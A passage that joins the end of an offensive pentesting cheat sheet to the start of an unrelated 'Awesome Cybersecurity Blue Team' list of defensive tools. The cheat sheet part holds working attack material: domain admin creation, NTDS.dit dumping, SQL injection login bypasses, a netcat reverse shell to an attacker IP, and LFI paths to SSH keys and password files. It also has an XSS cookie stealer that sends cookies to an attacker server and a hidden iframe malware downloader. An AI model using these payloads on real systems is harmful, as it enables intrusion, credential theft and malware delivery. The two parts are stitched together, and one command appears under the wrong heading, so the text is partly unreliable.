"password" /ADD ``` ```bash net group "Domain Admins" %username% /DOMAIN /ADD ``` **Gather NTDS.dit file** ```bash ntdsutil ``` ```bash activate instance ntds ``` ```bash ifm ``` ```bash create full C:\ntdsutil ``` ```bash quit ``` ```bash quit ``` # **SQLInjections** ### Common **Injections for Login Forms:** ```bash admin' -- ``` ```bash admin' # ``` ```bash admin'/* ``` ```bash ' or 1=1-- ``` ```bash ' or 1=1# ``` ```bash ' or 1=1/* ``` ```bash ') or '1'='1-- ``` ```bash ') or ('1'='1— ``` ## Uploading Files to Target Machine TFTP ```bash #TFTP Linux: cat /etc/default/atftpd to find out file serving location; default in kali /srv/tftp service atftpd start # Windows tftp -i $ATTACKER get /download/location/file /save/location/file ``` FTP ```bash # Linux: set up ftp server with anonymous logon access; twistd -n ftp -p 21 -r /file/to/serve # Windows shell: read FTP commands from ftp-commands.txt non-interactively; echo open $ATTACKER>ftp-commands.txt echo anonymous>>ftp-commands.txt echo whatever>>ftp-commands.txt echo binary>>ftp-commands.txt echo get file.exe>>ftp-commands.txt echo bye>>ftp-commands.txt ftp -s:ftp-commands.txt # Or just a one-liner (echo open 10.11.0.245&echo anonymous&echo whatever&echo binary&echo get nc.exe&echo bye) > ftp.txt & ftp -s:ftp.txt & nc.exe 10.11.0.245 443 -e cmd ``` CertUtil (download file from windows) ```bash certutil.exe -urlcache -f http://10.0.0.5/40564.exe bad.exe me ``` PHP ```bash <?php file_put_contents("/var/tmp/shell.php", file_get_contents("http://10.11.0.245/shell.php")); ?> ``` Python ```bash python -c "from urllib import urlretrieve; urlretrieve('http://10.11.0.245/nc.exe', 'C:\\Temp\\nc.exe')" ``` HTTP: Powershell ```bash python -c "from urllib import urlretrieve; urlretrieve('http://10.11.0.245/nc.exe', 'C:\\Temp\\nc.exe')" ``` HTTP: Linux ```bash wget http://$ATTACKER/file curl http://$ATTACKER/file -O scp ~/file/file.bin user@$TARGET:tmp/backdoor.py ``` NetCat ```bash # Attacker nc -l -p 4444 < /tool/file.exe # Victim nc $ATTACKER 4444 > file.exe ``` # Web Application ## LFI (Local File Inclusion) if we found an LFI, we can check each of those paths, we can use burpsuite intruder to see all Useful LFI files Linux /etc/passwd /etc/shadow /etc/issue /etc/group /etc/hostname /etc/ssh/ssh_config /etc/ssh/sshd_config /root/.ssh/id_rsa /root/.ssh/authorized_keys /home/user/.ssh/authorized_keys /home/user/.ssh/id_rsa /proc/[0-9]*/fd/[0-9]* /proc/mounts /home/$USER/.bash_history /home/$USER/.ssh/id_rsa /var/run/secrets/kubernetes.io/serviceaccount /var/lib/mlocate/mlocate.db /var/lib/mlocate.db Apache /etc/apache2/apache2.conf /usr/local/etc/apache2/httpd.conf /etc/httpd/conf/httpd.conf Red Hat/CentOS/Fedora Linux -> /var/log/httpd/access_log Debian/Ubuntu -> /var/log/apache2/access.log FreeBSD -> /var/log/httpd-access.log /var/log/apache/access.log /var/log/apache/error.log /var/log/apache2/access.log /var/log/apache/error.log MySQL /var/lib/mysql/mysql/user.frm /var/lib/mysql/mysql/user.MYD /var/lib/mysql/mysql/user.MYI Windows /boot.ini /autoexec.bat /windows/system32/drivers/etc/hosts /windows/repair/SAM /windows/panther/unattended.xml /windows/panther/unattend/unattended.xml /windows/system32/license.rtf /windows/system32/eula.txt Situation ``` http://<target>/index.php?parameter=value ``` ### How to Test ``` http://<target>/index.php?parameter=php://filter/convert.base64-encode/resource=index ``` ``` http://<target>/script.php?page=../../../../../../../../etc/passwd OR http://<target>/script.php?page=..//..//..//..//..//..//../etc/passwd OR curl http://<target>/script.php?page=..//..//..//..//..//..//../etc/passwd ``` ``` http://<target>/script.php?page=../../../../../../../../boot.ini ``` ### LFI Payloads - [Payload All the Things](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion/Intruders) - [Seclist LFI Intruder](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI) ## XSS ### Reflected ### Simple test This is a simple test to see what happens, this is not a prove that the field is vuln to xss <plaintext> ### Simple XSS test <script>alert('Found')</script> "><script>alert(Found)</script>"> <script>alert(String.fromCharCode(88,83,83))</script> ### Bypass filter of tag script `" onload="alert(String.fromCharCode(88,83,83))` " onload="alert('XSS') bla is not a valid image, so this cause an error <img src='bla' onerror=alert("XSS")> ### Persistent >document.body.innerHTML="<style>body{visibility:hidden;}</style><div style=visibility:visible;><h1>HACKED!</h1></div>"; ### PHP collector `> cookie.txtchmod 777 cookie.txt` edit a php page like colector.php as follow: <?php $cookie=GET['cookie']; $useragent=$_SERVER['HTTP_USER_AGENT']; $file=fopen('cookie.txt', 'a'); fwrite($file,"USER AGENT:$useragent || COOKIE=$cookie\n"); fclose($file); ?> Script to put in page: <scritp>new Image().src="http://OUR_SERVER_IP/colector.php?cookie="+document.cookie;</script> ### Malware Donwloader via XSS <iframe src="http://OUR_SERVER_IP/OUR_MALWARE" height="0" width="0"></iframe> ### How to play Mario with XSS <iframe src="https://jcw87.github.io/c2-smb1/" width="100%" height="600"></iframe> <input onfocus="document.body.innerHTML=atob('PGlmcmFtZSBzcmM9Imh0dHBzOi8vamN3ODcuZ2l0aHViLmlvL2MyLXNtYjEvIiB3aWR0aD0iMTAwJSIgaGVpZ2h0PSI2MDAiPjwvaWZyYW1lPg==')" autofocus> ### XSS payloads - [Payload All The Things](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection) - [Seclist XSS](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/XSS) ## MySql Cheat Sheet ```bash mysql -u [username] -p; #connect, you will be asked for password SHOW DATABASES; use DB_NAME; SHOW TABLES; select * from TABLE; ``` [MySQL cheatsheet](https://devhints.io/mysql) [MySQL Cheat Sheet](https://www.mysqltutorial.org/mysql-cheat-sheet.aspx) # Misc ## Linux file permissions ![Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%202.png](Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%202.png) ## Linux Cheat Sheet ![Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%203.png](Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%203.png) [](https://itblogr.com/wp-content/uploads/2020/04/The-Concise-Blue-Team-cheat-Sheets.pdf?fbclid=IwAR2lG6uxX3cMwu4G80Vwl_ZxpddwEPDqsyXb27yw5xjMOnAB1zX9ZEjDl78) [Hacking Cheat Sheets](https://cheatography.com/tag/hacking/) ![Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%204.png](Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%204.png) ![Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%205.png](Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%205.png) vi cheat sheet ![Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%206.png](Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%206.png) ## find cheat sheet ![Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%207.png](Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%207.png) ## Simple Local Web Servers Python local web server command, handy for serving up shells and exploits on an attacking machine. ```bash python -m SimpleHTTPServer 80 python3 -m http.server python -m pyftpdlib -p 21 #start a local ftp server with anonymous:anonymouscer updog ruby -rwebrick -e "WEBrick::HTTPServer.new (:Port => 80, :DocumentRoot => Dir.pwd).start" php -S 0.0.0.0:80 ``` ## Hash Examples Likely just use **hash-identifier** for this but here are some example hashes: [Untitled](Hacking%20Cheat%20Sheet%2053ddee9781a440ebb77926762047b8b3/Untitled%20Database%202c8912d8c7b747859491d93a41439662.csv) # Text Manipulation ## [awk](https://www.howtogeek.com/562941/how-to-use-the-awk-command-on-linux/) - command-line text manipulation dynamo ```bash awk -F: '{print $1,$6}' /etc/passwd $0: Represents the entire line of text. $1: Represents the first field. $2: Represents the second field. $7: Represents the seventh field. $45: Represents the 45th field. $NF: Stands for “number of fields,” and represents the last field. -F (separator string) ``` ### Sublime Text Editor ```jsx Splitting the Selection into Lines Select a block of lines, and then split it into many selections, one per line, using: Windows/Linux: Ctrl+Shift+L ``` ### sed cheat sheet ![https://s3.studylib.net/store/data/008266685_1-65c7d170c2600d5fd58feafc3611414f.png](https://s3.studylib.net/store/data/008266685_1-65c7d170c2600d5fd58feafc3611414f.png) ## Useful links [A cheat-sheet for password crackers](https://www.unix-ninja.com/p/A_cheat-sheet_for_password_crackers) [Penetration testing and webapp cheat sheets](https://doxsec.wordpress.com/2017/07/21/penetration-testing-and-webapp-cheat-sheets/) [The Ultimate List of SANS Cheat Sheets](https://www.sans.org/blog/the-ultimate-list-of-sans-cheat-sheets/?utm_medium=Social&utm_source=Twitter&utm_content=EMEA&utm_campaign=Security%20Trends%20Blog) [](https://www.sans.org/security-resources/posters/blueprint-building-pen-tester/160/download) [](https://www.sans.org/security-resources/posters/pen-test-pivots-payloads/180/download) [coreb1t/awesome-pentest-cheat-sheets](https://github.com/coreb1t/awesome-pentest-cheat-sheets) [Penetrating Testing/Assessment Workflow](https://gist.github.com/jivoi/724e4b4b22501b77ef133edc63eba7b4) [0DAYsecurity.com - The fastest resource to a proactive security](http://www.0daysecurity.com/pentest.html) [OSCP Ultimate CheatSheet - ByteFellow](https://www.bytefellow.com/oscp-ultimate-cheatsheet/) [Linux Privilege Escalation CheatSheet for OSCP - ByteFellow](https://www.bytefellow.com/linux-privilege-escalation-cheatsheet-for-oscp/) [Windows Privilege Escalation Cheatsheet for OSCP - ByteFellow](https://www.bytefellow.com/windows-privilege-escalation-cheatsheet-for-oscp/) [Cheat Sheet](https://jok3rsecurity.com/cheat-sheet/) [CountablyInfinite/oscp_cheatsheet](https://github.com/CountablyInfinite/oscp_cheatsheet) [OSCP: Developing a Methodology](https://falconspy.medium.com/oscp-developing-a-methodology-32f4ab471fd6) [Passing OSCP](https://scund00r.com/all/oscp/2018/02/25/passing-oscp.html) [swisskyrepo/PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings) [](https://storage.googleapis.com/vkmedia-wp-blogg-vk/uploads/uploads/sites/710/2013/08/Linux-101-Hacks.pdf)
# Awesome Cybersecurity Blue Team [![Awesome](https://awesome.re/badge-flat2.svg)](https://awesome.re) > A collection of awesome resources, tools, and other shiny things for cybersecurity blue teams. [Cybersecurity blue teams](https://en.wikipedia.org/wiki/Blue_team_(computer_security)) are groups of individuals who identify security flaws in information technology systems, verify the effectiveness of security measures, and monitor the systems to ensure that implemented defensive measures remain effective in the future. While not exclusive, this list is heavily biased towards [Free Software](https://www.gnu.org/philosophy/free-sw.html) projects and against proprietary products or corporate services. For offensive TTPs, please see [awesome-pentest](https://github.com/fabacab/awesome-pentest). Your contributions and suggestions are heartily ♥ welcome. (✿◕‿◕). Please check the [Contributing Guidelines](CONTRIBUTING.md) for more details. This work is licensed under a [Creative Commons Attribution 4.0 International License](http://creativecommons.org/licenses/by/4.0/). Many cybersecurity professionals enable racist state violence, wittingly or unwittingly, by providing services to local, state, and federal policing agencies or otherwise cooperating with similar institutions who do so. This evil most often happens through the coercive mechanism of employment under threat of lack of access to food, shelter, or healthcare. Despite this list's public availability, it is the maintainer's intention and hope that this list supports the people and organizations who work to counter such massive albeit banal evil. ![Image of a raised fist composed of the names of Black people murdered by taxpayer-funded racist police violence.](https://web.archive.org/web/20201028021653if_/https://lauerrealtygroup.com/wp-content/uploads/2020/06/BLM-FIST-scaled.jpg) ![Image of a "Blue Lives Matter" flag with the thin blue line being peeled away to reveal a Nazi swastika underneath.](https://web.archive.org/web/20201123181815if_/https://i.redd.it/86pl28p0dl631.jpg) **[DEFUND THE POLICE.](https://defundthepolice.org/)** ## Contents - [Automation](#automation) - [Code libraries and bindings](#code-libraries-and-bindings) - [Security Orchestration, Automation, and Response (SOAR)](#security-orchestration-automation-and-response-soar) - [Cloud platform security](#cloud-platform-security) - [Distributed monitoring](#distributed-monitoring) - [Kubernetes](#kubernetes) - [Service meshes](#service-meshes) - [Communications security (COMSEC)](#communications-security-comsec) - [DevSecOps](#devsecops) - [Application or Binary Hardening](#application-or-binary-hardening) - [Compliance testing and reporting](#compliance-testing-and-reporting) - [Dependency confusion](#dependency-confusion) - [Fuzzing](#fuzzing) - [Policy enforcement](#policy-enforcement) - [Supply chain security](#supply-chain-security) - [Honeypots](#honeypots) - [Tarpits](#tarpits) - [Host-based tools](#host-based-tools) - [Sandboxes](#sandboxes) - [Identity and AuthN/AuthZ](#identity-and-authnauthz) - [Incident Response tools](#incident-response-tools) - [IR management consoles](#ir-management-consoles) - [Evidence collection](#evidence-collection) - [Network perimeter defenses](#network-perimeter-defenses) - [Firewall appliances or distributions](#firewall-appliances-or-distributions) - [Operating System distributions](#operating-system-distributions) - [Phishing awareness and reporting](#phishing-awareness-and-reporting) - [Preparedness training and wargaming](#preparedness-training-and-wargaming) - [Post-engagement analysis and reporting](#post-engagement-analysis-and-reporting) - [Security configurations](#security-configurations) - [Security monitoring](#security-monitoring) - [Endpoint Detection and Response (EDR)](#endpoint-detection-and-response-edr) - [Network Security Monitoring (NSM)](#network-security-monitoring-nsm) - [Security Information and Event Management (SIEM)](#security-information-and-event-management-siem) - [Service and performance monitoring](#service-and-performance-monitoring) - [Threat hunting](#threat-hunting) - [Threat intelligence](#threat-intelligence) - [Fingerprinting](#fingerprinting) - [Threat signature packages and collections](#threat-signature-packages-and-collections) - [Tor Onion service defenses](#tor-onion-service-defenses) - [Transport-layer defenses](#transport-layer-defenses) - [Overlay and Virtual Private Networks (VPNs)](#overlay-and-virtual-private-networks-vpns) - [macOS-based defenses](#macos-based-defenses) - [Windows-based defenses](#windows-based-defenses) - [Active Directory](#active-directory) ## Automation - [Ansible Lockdown](https://ansiblelockdown.io/) - Curated collection of information security themed Ansible roles that are both vetted and actively maintained. - [Clevis](https://github.com/latchset/clevis) - Plugable framework for automated decryption, often used as a Tang client. - [DShell](https://github.com/USArmyResearchLab/Dshell) - Extensible network forensic analysis framework written in Python that enables rapid development of plugins to support the dissection of network packet captures. - [Dev-Sec.io](https://dev-sec.io/) - Server hardening framework providing Ansible, Chef, and Puppet implementations of various baseline security configurations. - [peepdf](https://eternal-todo.com/tools/peepdf-pdf-analysis-tool) - Scriptable PDF file analyzer. - [PyREBox](https://talosintelligence.com/pyrebox) - Python-scriptable reverse engineering sandbox, based on QEMU. - [Watchtower](https://containrrr.dev/watchtower/) - Container-based solution for automating Docker container base image updates, providing an unattended upgrade experience. ### Code libraries and bindings - [MultiScanner](https://github.com/mitre/multiscanner) - File analysis framework written in Python that assists in evaluating a set of files by automatically running a suite of tools against them and aggregating the output. - [Posh-VirusTotal](https://github.com/darkoperator/Posh-VirusTotal) - PowerShell interface to VirusTotal.com APIs. - [censys-python](https://github.com/censys/censys-python) - Python wrapper to the Censys REST API. - [libcrafter](https://github.com/pellegre/libcrafter) - High level C++ network packet sniffing and crafting library. - [python-dshield](https://github.com/rshipp/python-dshield) - Pythonic interface to the Internet Storm Center/DShield API. - [python-sandboxapi](https://github.com/InQuest/python-sandboxapi) - Minimal, consistent Python API for building integrations with malware sandboxes. - [python-stix2](https://github.com/oasis-open/cti-python-stix2) - Python APIs for serializing and de-serializing Structured Threat Information eXpression (STIX) JSON content, plus higher-level APIs for common tasks. ### Security Orchestration, Automation, and Response (SOAR) See also [Security Information and Event Management (SIEM)](#security-information-and-event-management-siem), and [IR management consoles](#ir-management-consoles). - [Shuffle](https://shuffler.io/) - Graphical generalized workflow (automation) builder for IT professionals and blue teamers. ## Cloud platform security See also [asecure.cloud/tools](https://asecure.cloud/tools/). - [Aaia](https://github.com/rams3sh/Aaia) - Helps in visualizing AWS IAM and Organizations in a graph format with help of Neo4j. - [Falco](https://falco.org/) - Behavioral activity monitor designed to detect anomalous activity in containerized applications, hosts, and network packet flows by auditing the Linux kernel and enriched by runtime data such as Kubernetes metrics. - [Kata Containers](https://katacontainers.io/) - Secure container runtime with lightweight virtual machines that feel and perform like containers, but provide stronger workload isolation using hardware virtualization technology as a second layer of defense. - [Principal Mapper (PMapper)](https://github.com/nccgroup/PMapper) - Quickly evaluate IAM permissions in AWS via script and library capable of identifying risks in the configuration of AWS Identity and Access Management (IAM) for an AWS account or an AWS organization. - [Prowler](https://github.com/toniblyx/prowler) - Tool based on AWS-CLI commands for Amazon Web Services account security assessment and hardening. - [Scout Suite](https://github.com/nccgroup/ScoutSuite) - Open source multi-cloud security-auditing tool, which enables security posture assessment of cloud environments. - [gVisor](https://github.com/google/gvisor) - Application kernel, written in Go, that implements a substantial portion of the Linux system surface to provide an isolation boundary between the application and the host kernel. ### Distributed monitoring See also [§ Service and performance monitoring](#service-and-performance-monitoring). - [Cortex](https://cortexmetrics.io/) - Provides horizontally scalable, highly available, multi-tenant, long term storage for Prometheus. - [Jaeger](https://www.jaegertracing.io/) - Distributed tracing platform backend used for monitoring and troubleshooting microservices-based distributed systems. - [OpenTelemetry](https://opentelemetry.io/) - Observability framework for cloud-native software, comprising a collection of tools, APIs, and SDKs for exporting application performance metrics to a tracing backend (formerly maintained by the OpenTracing and OpenCensus projects). - [Prometheus](https://prometheus.io/) - Open-source systems monitoring and alerting toolkit originally built at SoundCloud. - [Zipkin](https://zipkin.io/) - Distributed tracing system backend that helps gather timing data needed to troubleshoot latency problems in service architectures. ### Kubernetes See also [Kubernetes-Security.info](https://kubernetes-security.info/). - [KubeSec](https://kubesec.io/) - Static analyzer of Kubernetes manifests that can be run locally, as a Kuberenetes admission controller, or as its own cloud service. - [Kyverno](https://kyverno.io/) - Policy engine designed for Kubernetes. - [Linkerd](https://linkerd.io/) - Ultra light Kubernetes-specific service mesh that adds observability, reliability, and security to Kubernetes applications without requiring any modification of the application itself. - [Managed Kubernetes Inspection Tool (MKIT)](https://github.com/darkbitio/mkit) - Query and validate several common security-related configuration settings of managed Kubernetes cluster objects and the workloads/resources running inside the cluster. - [Polaris](https://polaris.docs.fairwinds.com/) - Validates Kubernetes best practices by running tests against code commits, a Kubernetes admission request, or live resources already running in a cluster. - [Sealed Secrets](https://github.com/bitnami-labs/sealed-secrets) - Kubernetes controller and tool for one-way encrypted Secrets. - [certificate-expiry-monitor](https://github.com/muxinc/certificate-expiry-monitor) - Utility that exposes the expiry of TLS certificates as Prometheus metrics. - [k-rail](https://github.com/cruise-automation/k-rail) - Workload policy enforcement tool for Kubernetes. - [kube-forensics](https://github.com/keikoproj/kube-forensics) - Allows a cluster administrator to dump the current state of a running pod and all its containers so that security professionals can perform off-line forensic analysis. - [kube-hunter](https://kube-hunter.aquasec.com/) - Open-source tool that runs a set of tests ("hunters") for security issues in Kubernetes clusters from either outside ("attacker's view") or inside a cluster. - [kubernetes-event-exporter](https://github.com/opsgenie/kubernetes-event-exporter) - Allows exporting the often missed Kubernetes events to various outputs so that they can be used for observability or alerting purposes. ### Service meshes See also [ServiceMesh.es](https://servicemesh.es/). - [Consul](https://consul.io/) - Solution to connect and configure applications across dynamic, distributed infrastructure and, with Consul Connect, enabling secure service-to-service communication with automatic TLS encryption and identity-based authorization. - [Istio](https://istio.io/) - Open platform for providing a uniform way to integrate microservices, manage traffic flow across microservices, enforce policies and aggregate telemetry data. ## Communications security (COMSEC) See also [Transport-layer defenses](#transport-layer-defenses). - [GPG Sync](https://github.com/firstlookmedia/gpgsync) - Centralize and automate OpenPGP public key distribution, revocation, and updates amongst all members of an organization or team. - [Geneva (Genetic Evasion)](https://censorship.ai/) - Novel experimental genetic algorithm that evolves packet-manipulation-based censorship evasion strategies against nation-state level censors to increase availability of otherwise blocked content. - [GlobaLeaks](https://www.globaleaks.org/) - Free, open source software enabling anyone to easily set up and maintain a secure whistleblowing platform. - [SecureDrop](https://securedrop.org/) - Open source whistleblower submission system that media organizations and NGOs can install to securely accept documents from anonymous sources. - [Teleport](https://goteleport.com/) - Allows engineers and security professionals to unify access for SSH servers, Kubernetes clusters, web applications, and databases across all environments. ## DevSecOps See also [awesome-devsecops](https://github.com/devsecops/awesome-devsecops). - [Bane](https://github.com/genuinetools/bane) - Custom and better AppArmor profile generator for Docker containers. - [BlackBox](https://github.com/StackExchange/blackbox) - Safely store secrets in Git/Mercurial/Subversion by encrypting them "at rest" using GnuPG. - [Checkov](https://www.checkov.io/) - Static analysis for Terraform (infrastructure as code) to help detect CIS policy violations and prevent cloud security misconfiguration. - [Cilium](https://cilium.io/) - Open source software for transparently securing the network connectivity between application services deployed using Linux container management platforms like Docker and Kubernetes. - [Clair](https://github.com/coreos/clair) - Static analysis tool to probe for vulnerabilities introduced via application container (e.g., Docker) images. - [CodeQL](https://securitylab.github.com/tools/codeql) - Discover vulnerabilities across a codebase by performing queries against code as though it were data. - [DefectDojo](https://www.defectdojo.org/) - Application vulnerability management tool built for DevOps and continuous security integration. - [Gauntlt](http://gauntlt.org/) - Pentest applications during routine continuous integration build pipelines. - [Git Secrets](https://github.com/awslabs/git-secrets) - Prevents you from committing passwords and other sensitive information to a git repository. - [SOPS](https://github.com/mozilla/sops) - Editor of encrypted files that supports YAML, JSON, ENV, INI and binary formats and encrypts with AWS KMS, GCP KMS, Azure Key Vault, and PGP. - [Snyk](https://snyk.io/) - Finds and fixes vulnerabilities and license violations in open source dependencies and container images. - [SonarQube](https://sonarqube.org) - Continuous inspection tool that provides detailed reports during automated testing and alerts on newly introduced security vulnerabilities. - [Trivy](https://github.com/aquasecurity/trivy) - Simple and comprehensive vulnerability scanner for containers and other artifacts, suitable for use in continuous integration pipelines. - [Vault](https://www.vaultproject.io/) - Tool for securely accessing secrets such as API keys, passwords, or certificates through a unified interface. - [git-crypt](https://www.agwa.name/projects/git-crypt/) - Transparent file encryption in git; files which you choose to protect are encrypted when committed, and decrypted when checked out. - [helm-secrets](https://github.com/jkroepke/helm-secrets) - Helm plugin that helps manage secrets with Git workflow and stores them anywhere, backed by SOPS. - [terrascan](https://runterrascan.io/) - Static code analyzer for Infrastructure as Code tools that helps detect compliance and security violations to mitigate risk before provisioning cloud native resources. - [tfsec](https://aquasecurity.github.io/tfsec/) - Static analysis security scanner for your Terraform code designed to run locally and in CI pipelines. ### Application or Binary Hardening - [DynInst](https://dyninst.org/dyninst) - Tools for binary instrumentation, analysis, and modification, useful for binary patching. - [DynamoRIO](https://dynamorio.org/) - Runtime code manipulation system that supports code transformations on any part of a program, while it executes, implemented as a process-level virtual machine. - [Egalito](https://egalito.org/) - Binary recompiler and instrumentation framework that can fully disassemble, transform, and regenerate ordinary Linux binaries designed for binary hardening and security research. - [Valgrind](https://www.valgrind.org/) - Instrumentation framework for building dynamic analysis tools. ### Compliance testing and reporting - [Chef InSpec](https://www.chef.io/products/chef-inspec) - Language for describing security and compliance rules, which become automated tests that can be run against IT infrastructures to discover and report on non-compliance. - [OpenSCAP Base](https://www.open-scap.org/tools/openscap-base/) - Both a library and a command line tool (`oscap`) used to evaluate a system against SCAP baseline profiles to report on the security posture of the scanned system(s). ### Dependency confusion See also [§ Supply chain security](#supply-chain-security). - [Dependency Combobulator](https://github.com/apiiro/combobulator) - Open source, modular and extensible framework to detect and prevent dependency confusion leakage and potential attacks. - [Confusion checker](https://github.com/sonatype-nexus-community/repo-diff) - Script to check if you have artifacts containing the same name between your repositories. - [snync](https://github.com/snyk-labs/snync) - Prevent and detect if you're vulnerable to dependency confusion supply chain security attacks. ### Fuzzing See also [Awesome-Fuzzing](https://github.com/secfigo/Awesome-Fuzzing). * [Atheris](https://pypi.org/project/atheris/) - Coverage-guided Python fuzzing engine based off of libFuzzer that supports fuzzing of Python code but also native extensions written for CPython. * [FuzzBench](https://google.github.io/fuzzbench/) - Free service that evaluates fuzzers on a wide variety of real-world benchmarks, at Google scale. * [OneFuzz](https://github.com/microsoft/onefuzz) - Self-hosted Fuzzing-as-a-Service (FaaS) platform. ### Policy enforcement - [AllStar](https://github.com/ossf/allstar) - GitHub App installed on organizations or repositories to set and enforce security policies. - [Conftest](https://conftest.dev/) - Utility to help you write tests against structured configuration data. - [Open Policy Agent (OPA)](https://www.openpolicyagent.org/) - Unified toolset and framework for policy across the cloud native stack. - [Regula](https://regula.dev/) - Checks infrastructure as code templates (Terraform, CloudFormation, K8s manifests) for AWS, Azure, Google Cloud, and Kubernetes security and compliance using Open Policy Agent/Rego. - [Tang](https://github.com/latchset/tang) - Server for binding data to network presence; provides data to clients only when they are on a certain (secured) network. ### Supply chain security See also [§ Dependency confusion](#dependency-confusion). - [Grafeas](https://grafeas.io/) - Open artifact metadata API to audit and govern your software supply chain. - [Helm GPG (GnuPG) Plugin](https://github.com/technosophos/helm-gpg) - Chart signing and verification with GnuPG for Helm. - [Notary](https://github.com/theupdateframework/notary) - Aims to make the internet more secure by making it easy for people to publish and verify content. - [in-toto](https://in-toto.io/) - Framework to secure the integrity of software supply chains. ## Honeypots See also [awesome-honeypots](https://github.com/paralax/awesome-honeypots). - [CanaryTokens](https://github.com/thinkst/canarytokens) - Self-hostable honeytoken generator and reporting dashboard; demo version available at [CanaryTokens.org](https://canarytokens.org/). - [Kushtaka](https://kushtaka.org) - Sustainable all-in-one honeypot and honeytoken orchestrator for under-resourced blue teams. - [Manuka](https://github.com/spaceraccoon/manuka) - Open-sources intelligence (OSINT) honeypot that monitors reconnaissance attempts by threat actors and generates actionable intelligence for Blue Teamers. ### Tarpits - [Endlessh](https://github.com/skeeto/endlessh) - SSH tarpit that slowly sends an endless banner. - [LaBrea](http://labrea.sourceforge.net/labrea-info.html) - Program that answers ARP requests for unused IP space, creating the appearance of fake machines that answer further requests very slowly in order to slow down scanners, worms, etcetera. ## Host-based tools - [Artillery](https://github.com/BinaryDefense/artillery) - Combination honeypot, filesystem monitor, and alerting system designed to protect Linux and Windows operating systems. - [Crowd Inspect](https://www.crowdstrike.com/resources/community-tools/crowdinspect-tool/) - Free tool for Windows systems aimed to alert you to the presence of malware that may be communicating over the network. - [Fail2ban](https://www.fail2ban.org/) - Intrusion prevention software framework that protects computer servers from brute-force attacks. - [Open Source HIDS SECurity (OSSEC)](https://www.ossec.net/) - Fully open source and free, feature-rich, Host-based Instrusion Detection System (HIDS). - [Rootkit Hunter (rkhunter)](http://rkhunter.sourceforge.net/) - POSIX-compliant Bash script that scans a host for various signs of malware. - [Shufflecake](https://shufflecake.net/) - Plausible deniability for multiple hidden filesystems on Linux. - [USB Keystroke Injection Protection](https://github.com/google/ukip) - Daemon for blocking USB keystroke injection devices on Linux systems. - [chkrootkit](http://chkrootkit.org/) - Locally checks for signs of a rootkit on GNU/Linux systems. ### Sandboxes - [Bubblewrap](https://github.com/containers/bubblewrap) - Sandboxing tool for use by unprivileged Linux users capable of restricting access to parts of the operating system or user data. - [Dangerzone](https://dangerzone.rocks/) - Take potentially dangerous PDFs, office documents, or images and convert them to a safe PDF. - [Firejail](https://firejail.wordpress.com/) - SUID program that reduces the risk of security breaches by restricting the running environment of untrusted applications using Linux namespaces and seccomp-bpf. ## Identity and AuthN/AuthZ - [Gluu Server](https://gluu.org/) - Central authentication and authorization for Web and mobile applications with a Free and Open Source Software cloud-native community distribution. ## Incident Response tools See also [awesome-incident-response](https://github.com/meirwah/awesome-incident-response). - [LogonTracer](https://github.com/JPCERTCC/LogonTracer) - Investigate malicious Windows logon by visualizing and analyzing Windows event log. - [Volatility](https://www.volatilityfoundation.org/) - Advanced memory forensics framework. - [aws_ir](https://github.com/ThreatResponse/aws_ir) - Automates your incident response with zero security preparedness assumptions. ### IR management consoles See also [Security Orchestration, Automation, and Response (SOAR)](#security-orchestration-automation-and-response-soar). - [CIRTKit](https://github.com/opensourcesec/CIRTKit) - Scriptable Digital Forensics and Incident Response (DFIR) toolkit built on Viper. - [Fast Incident Response (FIR)](https://github.com/certsocietegenerale/FIR) - Cybersecurity incident management platform allowing for easy creation, tracking, and reporting of cybersecurity incidents. - [Rekall](http://www.rekall-forensic.com/) - Advanced forensic and incident response framework. - [TheHive](https://thehive-project.org/) - Scalable, free Security Incident Response Platform designed to make life easier for SOCs, CSIRTs, and CERTs, featuring tight integration with MISP. - [threat_note](https://github.com/defpoint/threat_note) - Web application built by Defense Point Security to allow security researchers the ability to add and retrieve indicators related to their research. ### Evidence collection - [AutoMacTC](https://github.com/CrowdStrike/automactc) - Modular, automated forensic triage collection framework designed to access various forensic artifacts on macOS, parse them, and present them in formats viable for analysis. - [OSXAuditor](https://github.com/jipegit/OSXAuditor) - Free macOS computer forensics tool. - [OSXCollector](https://github.com/Yelp/osxcollector) - Forensic evidence collection & analysis toolkit for macOS. - [ir-rescue](https://github.com/diogo-fernan/ir-rescue) - Windows Batch script and a Unix Bash script to comprehensively collect host forensic data during incident response. - [Margarita Shotgun](https://github.com/ThreatResponse/margaritashotgun) - Command line utility (that works with or without Amazon EC2 instances) to parallelize remote memory acquisition. - [Untitled Goose Tool](https://github.com/cisagov/untitledgoosetool) - Assists incident response teams by exporting cloud artifacts from Azure/AzureAD/M365 environments in order to run a full investigation despite lacking in logs ingested by a SIEM. ## Network perimeter defenses - [Gatekeeper](https://github.com/AltraMayor/gatekeeper) - First open source Distributed Denial of Service (DDoS) protection system. - [fwknop](https://www.cipherdyne.org/fwknop/) - Protects ports via Single Packet Authorization in your firewall. - [ssh-audit](https://github.com/jtesta/ssh-audit) - Simple tool that makes quick recommendations for improving an SSH server's security posture. ### Firewall appliances or distributions See also [Wikipedia: List of router and firewall distributions](https://en.wikipedia.org/wiki/List_of_router_and_firewall_distributions). - [IPFire](https://www.ipfire.org/) - Hardened GNU/Linux based router and firewall distribution forked from IPCop. - [OPNsense](https://opnsense.org/) - Hardened FreeBSD based firewall and routing platform forked from pfSense. - 